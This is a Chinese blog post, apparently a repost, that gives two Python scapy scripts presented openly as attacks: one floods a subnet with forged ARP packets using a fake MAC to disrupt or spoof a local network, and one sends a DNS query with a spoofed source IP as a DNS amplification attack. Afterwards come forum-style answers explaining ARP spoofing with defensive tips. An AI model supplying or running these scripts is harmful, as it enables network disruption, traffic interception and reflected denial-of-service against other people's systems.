scapy模拟数据包实现arp攻击

Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子,pythonscapy


热度 1  评论 183
www.BkJia.Com  网友分享于:   2014-10-24 01:10:52     浏览数7763次

Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子,pythonscapy


scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送、嗅探、解析和伪造网络数据包,常常被用到网络攻击和测试中。

这里就直接用python的scapy搞。

这里是arp的攻击方式,你可以做成arp攻击。

复制代码 代码如下:

#!/usr/bin/python
"""
ARP attack
"""
import sys, os
from scapy.all import *
if os.geteuid() != 0:
    print "This program must be run as root. Aborting."
    sys.exit()

if len(sys.argv) < 2:
    print "Pkease Use %s x.x.x" % (sys.argv[0])
    exit()
attackIP = sys.argv[1] + ".0/24"
srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=attackIP, psrc="192.168.1.100", hwsrc="00:66:66:66:66:66"), timeout=2)

dns放大攻击

复制代码 代码如下:

#coding:utf-8
from scapy import *
from scapy.all import *

a = IP(dst='8.8.8.8',src='192.168.1.200') #192.168.1.200 为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)
p = a/b/c
send(p)
~


arp入侵攻击,DNS欺骗攻击

你好朋友,ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 
ARP攻击主要是存在于局域网网络中,局域网中若有一个人感染ARP木马,则感染该ARP木马的系统将会试图通过“ARP欺骗”手段截获所在网络内其它计算机的通信信息,并因此造成网内其它计算机的通信故障。
建议你安装360木马防火墙,360安全卫士的ARP防火墙对ARP攻击还是很管用的,安装后ARP防火墙默认是关闭的,你自行开启一下,这样就能很好的帮你阻止ARP攻击了,去360官网下载最新的360安全卫士就行,木马防火墙在360安全卫士里。
希望我的回答对你有帮助。
 

DNS欺骗攻击,ARP攻击完全上不了网该怎办

反ARP攻击的绝招,让你在ARP的炮雨攻击下永不掉线 
你的局域网经常掉线吗?你受过ARP攻击吗?出现过烦人的IP冲突吗?如果有,或者以防后患,请看下文,教你反ARP攻击的绝招,让你在ARP的炮雨攻击下永不掉线。 
所遇情况: 
第一。局域网中经常有人用网络执法官、剪刀手等工具限制其他人上网,虽然有反网络执法官等软件,但是用起来甚是不爽啊! 
第二。局域网中有人中了病毒,自动发送大量ARP攻击到局域网中。 
原理: 
ARP协议是windows网络中查找IP和网卡的基础。所以不能绕开它。所有的防御ARP攻击的方法,都必须许可ARP协议。以致目前用着还算可以的网络工具比如360安全卫士,都只能监测到攻击信息,却奈何不了他什么。 
具体方法: 
解决ARP攻击最根本的办法只有一个-----建虚拟网卡。可以使用泡泡鱼虚拟网卡,在大的下载站都有下载。 
把虚拟网卡的IP指定为你正常使用的网卡的网关的IP地址,比如你的网卡的地址现在是10.176.168.33,网关是 10.176.168.1,那么给新的虚拟网卡10.176.168.1地址,然后再把新的虚拟网卡点右键禁用掉。这个网卡必须禁用,否则你上网,都跑到 虚拟网卡了,其实它是不通的。
 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值